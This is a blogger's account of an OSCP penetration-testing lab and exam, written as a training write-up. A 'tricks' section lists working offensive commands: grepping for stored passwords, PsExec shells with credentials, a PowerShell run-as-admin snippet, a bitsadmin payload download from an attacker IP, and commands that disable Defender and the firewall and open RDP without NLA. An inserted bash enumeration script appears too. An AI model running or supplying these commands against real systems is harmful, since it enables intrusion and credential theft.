31 days of OSCP Experience

Posted on 17 Apr 2018 by Paranoid Ninja


Hi folks. I completed my OSCP exam on the first attempt last year in October. I'd say the exam wasn't as hard as I was expecting it to be. The exam started at 13:30 on 23rd October and all the machines were pwned by 19:30 the same day. The next two hours I spent on building a fully customised report and sent the report then and there. So the whole exam of 24 hrs plus report of another 24 hours was all done in around a total of 8 hours. I received a mail from Offsec in the next two days stating I had cleared the exam.

This is, however, what happened during my exam. A lot of people who know me were asking me why I found the exam to be easy. I am not a pro, nowhere near an elite. It's just that I tried harder. So, let me take you through how it all started and what preparations I did before going in for the exam.

P.S.: I never used the kali virtual machine that was given by Offsec. I used my own custom Debian 9-Stretch distro with custom tools which I used throughout the labs as well as exam.


The Prologue

I came back home from an overseas threat hunting project in July 2017 and saw that two of my friends had already registered for the OSCP course. Thinking why not, I registered myself on 6th August for a two-month lab. My labs were scheduled to start on the 10th of September. I had no projects for a month except the daily office routine of 9 hours. My friend's lab had already started and looking at him solving them I started shitting bricks, the reason being that I was never really good at WebApp sec. So, I knew I would have to study hard for it. I started solving VMs from VulnHub and HTB (HackTheBox).

With sleepless nights passing by, by the 5th of September I had already solved a total of around 70+ CTFs/machines. I already had decent knowledge of Python, Ruby, C and C++, so I wasn't really worried about exploit modifications. My sole problem was WebAppSec, because I knew that once I am in, privilege escalation has always been easy for me. The next 4 days, from 6th to 9th September, I spent on reading up on assembly and buffer overflow videos from Pentester Academy (Vivek Ramachandran). Trust me when I say I never did exploit development before this and they helped a lot. His videos are awesome.


Main()

So this is the 10th of September, i.e. Sunday, and my labs started at 6:00 A.M. I connected to Offsec's VPN, and I knew that all I would be getting are just IPs and everything else depends on what I do from there. I ran a quick Nmap scan and from the few hostnames that I found, I was able to identify that I was in a domain environment. So, I quickly wrote a bash script to perform DNS lookups in a loop to get all existing IPs and possible hostnames from the AD DC. You can find the script here. Once I found the basic details of all the systems, I tried to crack the first machine and it was done in around 15-20 minutes or so. I tried the next and so on in numerically ascending order of the IPs that I had discovered and was able to crack four machines on the first day. My confidence shot sky high that day. I hadn't used Metasploit for a single machine till now.

So, I made myself a few commitments:

  1. Try avoiding Metasploit at all costs. Neither exploits nor meterpreter shells. (However, I had to use them in a few places where I needed shellcode or needed to quickly migrate my shell away from an unstable exploit/process.)
  2. Only use msfvenom for building shellcode.
  3. Use netcat for reverse shells.
  4. Solve at least 3 machines a day. By doing this, I should be able to complete all my lab machines in 30 days max.

I had my office hours from 9:00 to 18:00 at an office 50km away from my house. Travelling takes around 2 hours. So, calculating all that, I used to wake up at 5:00 with a target to solve at least one machine by 6:30, freshen up and then leave for office. Once I am back from office by 19:30, my aim was to solve at least two machines by 24:00. Some days 2 machines, some days 3; in this manner I was able to solve the first 35 machines by the 25th of September. Sundays were a home lockdown for me and I was able to pwn a lot on these days. I used the below tools and techniques, as far as I remember, to exploit most of the machines:

  1. Nmap, Netcat for port scanning and testing vulnerabilities
  2. Dirbuster, Gobuster, Nikto and Burpsuite for Web application scanning
  3. Tcpdump, Wireshark for sniffing traffic
  4. Python HTTP Servers to serve RFI php shells.
  5. Mimikatz, pwdump, fgdump and procmon for password dumping and pass the hash/golden ticket attacks
  6. Cuda Hashcat for password cracking (Nvidia graphics card)
  7. Iptables, proxychains and sshuttle for routing hops
  8. Medusa, Hydra for Http login form bruteforcing
  9. Grep, sed, awk, sort, uniq, find, findstr, cut for finding passwords and sensitive files during privilege escalation and post exploitation recon
  10. Snmpenum, enum4linux, nullinux, smbmap for smb and snmp enumeration
  11. Powershell scripts and bitsadmin(built-in windows tool) to download files (highly recommended if you are not using meterpreter shell)
  12. Sendemail, Python Servers for social engineering (yes, you will have to perform SE on automated bot systems for client side attacks)
  13. Accesscheck.exe from sysinternals and Ntrights.exe, Churrasco.exe to find access misconfigurations
  14. Psexec for lateral movements and remote shells
  15. Cadaver and davtest for windows asp based web server to test read/write access

I used a lot of one liner reverse shells of perl, python, bash, socat and awk from pentestmonkey for quick tcp reverse shells.


Other tricks

Post Exploit Enumeration

Because of -w (whole word match) 'pass' does not match 'password', which is why both are searched for separately. A bare grep -r over / wanders into /proc, /sys and /dev (pipes there hang it) and floods the output with binary junk, so skip binaries with -I, exclude the pseudo-filesystems and silence the permission errors:

    grep -rnwI '/' --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev -ie 'pass' --color=always 2>/dev/null
    grep -rnwI '/' --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev -ie 'password' --color=always 2>/dev/null
    grep -rnwI '/' --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev -ie 'DB_PASS' --color=always 2>/dev/null
    grep -rnwI '/' --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev -ie 'DB_PASSWORD' --color=always 2>/dev/null
    grep -rnwI '/' --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev -ie 'DB_USER' --color=always 2>/dev/null

File Upload on linux systems via base64 encoding

Converting a file to base64 (-w0 keeps it on a single line, which is much easier to paste into a remote shell without wrapped or stray newlines):

base64 -w0 file2upload

Once the file is converted to base64, create a new file on the remote system and paste the base64 output into it. The next step is to decode it back to binary, then compare a hash (md5sum or sha256sum on both sides) to make sure nothing was lost or mangled in the paste:

cat fileWithBase64Content | base64 -d > finalBinary

You can also use smbserver.py from Impacket's repo to host a temporary SMB server and fetch files on Windows from it with net use or copy. Newer Windows builds ship without the SMB1 client, so start it with -smb2support or the share will not mount.

PSexec Shells of Remote Systems

.\psexec64.exe -accepteula \\192.168.x.x -u .\administrator -p admin@123 cmd.exe

Eg: Get a cmd.exe shell on the remote system as the local user administrator with the password admin@123. -accepteula stops PsExec from hanging on the licence dialog when you are in a non-interactive shell, and adding -s gives you the shell as SYSTEM instead of the supplied user.

Powershell Sudo for Windows

There may be times when you know the admin creds but only have a low-privileged shell. Unlike Linux, we cannot sudo on Windows machines. So I wrote a simple PowerShell snippet that runs a file as another user: you can run a batch file to add a new superuser or just execute a meterpreter binary as admin. It works in two steps: a child PowerShell is started under the admin credentials, and that child starts the target file with -Verb RunAs to get past UAC. The RunAs step is a UAC elevation, so from a reverse shell it only completes when no prompt is raised, i.e. the account is the built-in Administrator (exempt from UAC token filtering by default) or UAC is disabled. The below commands are to be run in a PowerShell window:

    $pw = ConvertTo-SecureString "EnterPasswordHere" -AsPlainText -Force
    $pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "EnterDomainName\EnterUserName",$pw
    $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
    # Double quotes so $script is expanded here; with single quotes the child PowerShell
    # receives the literal text $script, which is undefined in its own session.
    Start-Process powershell -Credential $pp -ArgumentList "-NoProfile -Command &{Start-Process '$script' -Verb RunAs}"

If, however, you want to run the PowerShell from a cmd prompt, you can store the above commands in an xyz.ps1 file and run it from cmd as below:

powershell -ExecutionPolicy Bypass -File xyz.ps1

Download files in Windows with bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\Users\%USERNAME%\AppData\Local\Temp\xyz.exe

The local file name must be a full path. bitsadmin is deprecated but still shipped on current Windows versions; if the job sits there without progress, /priority foreground makes BITS download immediately instead of waiting for idle bandwidth.

Disable firewall/defender and enable RDP for all

Sometimes you will have the admin creds and may need an RDP session to find out what exactly is going on in the backend for post exploitation. The commands below disable the firewall and enable RDP without Network Level Authentication (if your user is not an admin it also needs to be in the Remote Desktop Users group):

    REM Defender; on newer builds the service is protected and this stop is refused
    sc stop WinDefend
    REM Vista and later firewall syntax
    netsh advfirewall show allprofiles
    netsh advfirewall set allprofiles state off
    REM XP/2003 legacy syntax, harmless on newer systems
    netsh firewall set opmode disable
    REM Allow Terminal Services connections and switch off NLA so any client can connect
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Find files with SUID permission

find / -perm -4000 -type f 2>/dev/null

Find files with open permissions (-perm -777 only matches files that are fully open; -perm -o=w matches anything world-writable, which is the usual misconfiguration)

find / -perm -777 -type f 2>/dev/null

Find files with SUID permission for current user

    find / -perm /u=s -user "$(whoami)" 2>/dev/null
    find / -user root -perm -4000 -print 2>/dev/null

Find files with writable permission for the current user or current group (filtering on -user `whoami` only lists files you own, which you can write anyway; to find files owned by someone else that you can write, use -writable, which asks the kernel and so also honours group membership)

    find / -perm /u=w -user "$(whoami)" 2>/dev/null
    find / -perm /u+w,g+w -type f -user "$(whoami)" 2>/dev/null
    find / -writable -type f ! -user "$(whoami)" 2>/dev/null

Find directories with writable permissions for current user or current group

    find / -perm /u=w -type d -user "$(whoami)" 2>/dev/null
    find / -perm /u+w,g+w -type d -user "$(whoami)" 2>/dev/null
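The credential grep and the SUID/writable find one-liners above, combined into a few shell helpers as an added example (this is not the author's recon script). It fixes the pitfalls of the raw one-liners: grep recursing into /proc, the -user `whoami` filter listing only files you already own, and -perm -777 missing most world-writable files. It assumes GNU grep and GNU find (Kali/Debian) and runs against a constructed fixture directory standing in for a target filesystem.

```bash
#!/usr/bin/env bash
# Added example, not the author's recon script: Linux post-exploitation enumeration
# helpers. Assumes GNU grep and GNU find.

# Case-insensitive and without -w, so "password", "db_passwd" and "DB_PASSWORD" all match.
CRED_REGEX='pass(word|wd)?[[:space:]]*[=:]|DB_PASS(WORD)?|DB_USER|secret[[:space:]]*[=:]'

# grep -r over / walks into /proc, /sys and /dev (pipes there hang it) and dumps binary
# noise; -I skips binaries and --exclude-dir keeps it on real filesystems.
find_cred_strings() {          # usage: find_cred_strings <root>
    grep -rInEi --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=run \
         "$CRED_REGEX" "$1" 2>/dev/null
}

# SUID files, printed as "owner path" so the root-owned candidates stand out.
find_suid() {                  # usage: find_suid <root>
    find "$1" -xdev -type f -perm -4000 -printf '%u %p\n' 2>/dev/null
}

# World-writable files and directories: -perm -o=w matches anything others can write,
# whereas -perm -777 only matches files that are fully open.
find_world_writable() {        # usage: find_world_writable <root>
    find "$1" -xdev \( -type f -o -type d \) -perm -o=w 2>/dev/null
}

# Files owned by someone else that the current user can still write to. -writable asks
# the kernel (group membership and ACLs included) instead of guessing from mode bits;
# files we own are skipped because those are writable anyway.
find_writable_by_me() {        # usage: find_writable_by_me <root>
    find "$1" -xdev -type f -writable ! -user "$(id -un)" 2>/dev/null
}

# Constructed fixture standing in for a target: a web config with DB creds, a fake /proc
# entry that must be skipped, a SUID "backup" helper and a world-writable cron script.
make_fixture() {
    local d
    umask 022
    d=$(mktemp -d)
    mkdir -p "$d/var/www/html" "$d/etc/cron.d" "$d/proc/1"
    printf '<?php\n$DB_USER = "webapp";\n$DB_PASSWORD = "Summer2017!";\n' > "$d/var/www/html/config.php"
    printf 'password=not-a-real-hit\n' > "$d/proc/1/environ"
    : > "$d/var/www/html/backup"; chmod 4755 "$d/var/www/html/backup"
    printf '#!/bin/sh\necho cleanup\n' > "$d/etc/cron.d/cleanup.sh"; chmod 0666 "$d/etc/cron.d/cleanup.sh"
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    root=$(make_fixture)
    echo "== credential strings"; find_cred_strings "$root"
    echo "== suid files";         find_suid "$root"
    echo "== world-writable";     find_world_writable "$root"
    echo "== writable by me";     find_writable_by_me "$root"
    rm -rf "$root"
fi
```

Run it with --demo to see the output against the fixture; on a real box call the helpers with / as the root (and expect them to take a while on a slow lab link). The fixture's fake /proc entry contains a "password=" string precisely to show that the exclusion works, which matters because the real /proc/*/environ files would otherwise drown the results.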

If you are not going to use meterpreter, then the tools from Microsoft's Sysinternals toolkit can be a lot of help. I used them to dump passwords from memory using procmon, and psexec to move laterally through the domain network and pwn the AD DC. There are also other tools like netmon.exe and SMB analysis tools which can help you identify which machine is communicating with which system.

The hardest machines that I had heard about before starting OSCP were Pain, Ghost, Humble and Sufferance. However, none of these were the hardest machines for me. The hardest machine for me was in a totally different network, with the name JACK. Pain was done in around 6 hours, Ghost and Sufferance in around 3-4 hours each. Humble made me pull my hair out. It was an awesome machine with a mix of multiple exploits combined together. I started solving this machine at 12.00 a.m. at night, and finally found a way in at 4.30 in the morning. I thought that since the entry point was hard, the privilege escalation would be easy, but boy was I wrong. It took me another 4 hours to escalate privileges. From 12.00 at night to 9.00 in the morning, and finally this machine was done.

Now comes the hard part. I found out that there is more than one network in the labs, all segregated. I tried to exploit them, but was unable to pwn any. Upon looking closely, I found there are dependencies on other machines as well. In short, machines in other networks, as well as in the current network, are all correlated. This is when I realised something:

Exploitation of a system is not hard. But It’s the POST EXPLOITATION skills which can make you go crazy…

Most people I've known or seen tend to solve only the first 30 machines of the labs, then take the exam and then fail. The reason for failure is that the main lab starts after the first 39 machines. When you hop on to the other networks, you find dependencies between machines like in a real domain network, do custom routing manually, use iptables, modify Windows firewall rules, set up proxychains and do cross-network scanning via sshuttle. This is when you lose your shit. I had to go back to all those 35 machines that I had solved and start running my post-exploitation script on all of them. You can find the Linux recon script I wrote in bash here. It's useful for privilege escalation as well as for finding passwords of other users, misconfigured directories and so on. For Windows, I was manually traversing the directories and browsing files, or was using the findstr command to find sensitive files.

So, it's the 5th of October and most machines were pwned by now. Performing a scan, I realised there was one last network pending with 3 machines in it. And man, this network was crazy. In the OSCP VPN lab, you can see when a machine was reverted or was being attempted by someone else. Most machines were reverted with a backlog of max 2 days. But holy shit. The machines in this network hadn't even been touched for the past 54 freakin' days. This was a ghost town and I had to hop multiple networks to get here. The connection was slow as shite and performing a slow nmap scan took hours. Finally I was able to pwn two machines from there. 54 machines done, 28 days over. I still had 33 days to go and one last machine standing in front of me. This was the mighty JACK. Scary as hell and nothing to be found. I consulted the Offsec admin, and they said "Look at what's in front of you". This made me remember a dialogue from Mr. Robot.

"You can only see what's in front of you and not what's above you"

It took me two days and I had nothing. Before I went crazy, I thought of consulting my friend who had already completed that machine, and he gave me a small hint. I then realised what the Offsec admin had said. Everything was exactly in front of me. I had just ignored it thinking it can't be that stupid, and it was exactly that. It was a big facepalm. Finally, on the 31st day, I solved that machine and all my lab machines were completed (including a hidden secret machine which is super dependent).

I decided to just take a rest for a few days away from computer, prepare my notes of whatever I found and finally scheduled the exam for 23rd October.


Final Exam:

I was informed by Offsec about the minimum marks required to clear the exam. And I was not going to submit my lab report, which meant I had to solve almost all the machines to clear the exam.

Exam started at 13:00. I completed the first machine, the one with the highest points, in around 20 minutes. It was pretty easy. I got stuck on the second machine, the one with the lowest points, for 1.5 hours. It scared me, so I decided to skip that machine. I solved 2 more machines in 30 minutes each. The last machine with the highest marks was literally damn confusing but I was able to pwn it in 1.5 hours or so. So I had all the points required to clear the exam and still 19.5 hours to solve the second machine, with the lowest points, which I had left. Staring at whatever I had collected from that machine for 1 hour, I found out that the answer was right in front of me. I tried a manual exploit and BAMN! I was root.

However, I didn't have to use Metasploit or meterpreter for a single machine. I finally built the report and sent it by 21:00 and got a notification two days later that I had cleared the exam.

Epilogue

The final thing I would say to people is that the exam doesn't matter. It's the labs which actually make you learn every damn thing. If you don't solve at least the top 45-50 machines in the lab, then you literally wasted your lab money. OSCP is not an exam, and at least not something that should be done to increase your value in the market. OSCP is a journey, and it only tastes better when you are frustrated and finally find the answer yourself.

This was a long post I know, but I wanted to share all my knowledge that I had received during my exam. If you have any questions, do post them in the comments below.